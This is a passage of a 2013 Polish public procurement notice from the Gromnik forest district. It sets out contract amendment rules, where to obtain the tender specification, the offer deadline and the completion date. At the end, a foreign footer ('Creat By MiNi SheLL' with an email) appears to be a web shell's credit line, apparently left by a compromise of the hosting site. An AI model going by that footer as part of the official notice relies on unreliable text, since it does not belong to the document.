Warunki dokonania zmiany terminu: w przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
b)	Możliwości zmian osobowych, co do zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez zamawiającego.
4.	Zmiana postanowień umowy będzie wprowadzana pisemnie, a Zamawiający będzie dążył do zawarcia porozumienia z drugą stroną umowy.
6.	Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy.
7.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
8.	Określa się następujący tryb dokonywania zmian postanowień zawartej umowy:
   - Zamawiający / Wykonawca wnioskuje do Wykonawcy/ Zamawiającego w sprawie możliwości  dokonania wskazanej zmiany;
   -  przyczyny dokonania zmiany postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach ( notatka służbowa, pismo Wykonawcy, protokół konieczności i itp.)
   -  protokół konieczności wymaga potwierdzenia przez projektanta i zatwierdzenia przez zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_krakow/nadl_gromnik/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGL LP Nadleśnictwo Gromnik
Gen. Andersa 1
33-180 Gromnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2013 godzina 09:00, miejsce: PGL LP Nadleśnictwo Gromnik
Gen. Andersa 1
33-180 Gromnik
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia: od podpisania umowy do  30.11.2013 roku,  natomiast w zakresie nadzoru autorskiego do zakończenia prac budowlanych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com